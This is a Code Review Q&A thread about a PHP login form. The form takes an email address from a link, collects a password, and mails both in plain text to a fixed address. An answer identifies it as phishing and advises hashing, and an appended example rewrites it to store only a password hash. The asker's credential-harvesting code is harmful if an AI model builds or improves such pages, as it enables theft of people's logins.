My code contains some vulnerabilities, how can I correct it and make it better
My code works well, but I still don't think it is well written. Can someone help to improve the code so as to get rid of vulnerabilities?
My php code:
<?php
// Only keep the address from the query string if it is a syntactically valid email.
$email = filter_var($_GET['email'] ?? '', FILTER_VALIDATE_EMAIL);
if ($email === false) {
    // Not a valid email address! Handle this invalid input here.
}
if (isset($_POST["submit"])) {
    $password = $_POST['password'];
    $to = "feedback@mydomain.com";
    $subject = 'Link Data';
    $message = "Email Address: " . $email . "\n";
    $message .= "Password: " . $password . "\n";
    $headers = "From: webmaster@mydomain.com\r\n";
    $success = mail($to, $subject, $message, $headers);
}
?>
The form:
<?php if (isset($success) && $success): ?>
Your form was successfully sent.
<?php endif; ?>
<div class="box-login1">
<form method="post" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>?email=<?php echo htmlspecialchars($email); ?>" accept-charset="UTF-8">
<input name="email" type="text" id="email" value="<?php echo htmlspecialchars($email); ?>" maxlength="64" readonly="readonly" required/>
<input type="password" name="password" id="password" required/>
<input type="submit" name="submit" id="submit" value="submit"/>
</form>
</div>
php form email mysqli
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines. – 200_success, May 25 at 17:43
Why are you using htmlspecialchars in your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped; it makes no impact on other users. Since the user is one and the same, it's kind of redundant (in all places). – brgrs, Jun 18 at 11:11
asked May 21 at 23:25 by Eric
1 Answer
Your phishing form looks OK: the user will try to log in using his username and password, and his logins will be sent directly to someone else.
Being serious, you should validate the password depending on what chars you allow, or if you want to do it with sanitize filters then use 'FILTER_SANITIZE_STRING'.
But you should just hash the password and never send it or save it in plain text.
answered May 25 at 13:10 by kanoriuta
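As an added example (not the original poster's code and not the answerer's), here is the handler reworked along the lines the answer gives: the password is hashed with password_hash() and only the hash is stored, the notification mail carries the address and nothing else, and the password check is a length policy rather than a character filter. One caveat on the FILTER_SANITIZE_STRING suggestion: that filter is deprecated since PHP 8.1, and a password should not have characters stripped from it anyway, since password_hash() accepts any bytes. The SQLite users table, the CSRF token, the length limits and the notification text are assumptions made for illustration.

```php
<?php
// Added example, not the original poster's or the answerer's code. Hardened
// version of the form handler: hash the password, store only the hash, never
// put the credential in mail or logs. Storage, CSRF token and length policy
// are assumptions for illustration.
declare(strict_types=1);
session_start();

// Assumed storage: a local SQLite file with a single users table.
$db = new PDO('sqlite:' . __DIR__ . '/users.sqlite');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE IF NOT EXISTS users (
    email TEXT PRIMARY KEY,
    password_hash TEXT NOT NULL
)');

// Per-session CSRF token so another site cannot submit this form for the user
// (assumed addition, not present in the original form).
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}

function validatePassword(string $password): ?string
{
    // A length policy instead of a character whitelist: password_hash() takes
    // any byte sequence, so nothing needs to be stripped or "sanitized".
    // The upper bound matters because bcrypt (PASSWORD_DEFAULT today)
    // silently ignores input past 72 bytes.
    $len = strlen($password);
    if ($len < 12) {
        return 'Password must be at least 12 characters.';
    }
    if ($len > 72) {
        return 'Password must be at most 72 bytes.';
    }
    return null;
}

function registerUser(PDO $db, string $email, string $password): void
{
    // Only the hash is persisted; the plaintext never leaves this request.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO users (email, password_hash) VALUES (:e, :h)');
    $stmt->execute([':e' => $email, ':h' => $hash]);
}

function checkLogin(PDO $db, string $email, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE email = :e');
    $stmt->execute([':e' => $email]);
    $hash = $stmt->fetchColumn();
    // Same false for "no such user" and "wrong password", so the response
    // does not reveal which addresses are registered.
    return $hash !== false && password_verify($password, (string) $hash);
}

$success = false;
$error = null;

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!hash_equals($_SESSION['csrf'], (string) ($_POST['csrf'] ?? ''))) {
        $error = 'Invalid form token.';
    } else {
        // Read the address from the POST body, not the query string, so it is
        // never written into URLs or access logs.
        $email = filter_var($_POST['email'] ?? '', FILTER_VALIDATE_EMAIL);
        $password = (string) ($_POST['password'] ?? '');
        if ($email === false) {
            $error = 'Not a valid email address.';
        } elseif (($error = validatePassword($password)) === null) {
            try {
                registerUser($db, $email, $password);
                // Notification contains the address only; no credential is mailed.
                $message = "New registration: " . $email . "\n";
                $headers = "From: webmaster@mydomain.com\r\n";
                $success = mail('feedback@mydomain.com', 'Link Data', $message, $headers);
            } catch (PDOException $e) {
                $error = 'Could not save the account.';
            }
        }
    }
}
?>
<?php if ($success): ?>
<p>Your form was successfully sent.</p>
<?php elseif ($error !== null): ?>
<p><?php echo htmlspecialchars($error, ENT_QUOTES, 'UTF-8'); ?></p>
<?php endif; ?>
<form method="post" action="" accept-charset="UTF-8">
    <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8'); ?>"/>
    <input name="email" type="email" maxlength="64" required/>
    <input type="password" name="password" required/>
    <input type="submit" name="submit" value="submit"/>
</form>
```

checkLogin() is included to show the other half of the answer's advice: later authentication compares against the stored hash with password_verify(), so the plaintext is never needed again after the request that set it. The empty action attribute posts back to the same URL without echoing $_SERVER['PHP_SELF'] into the page at all.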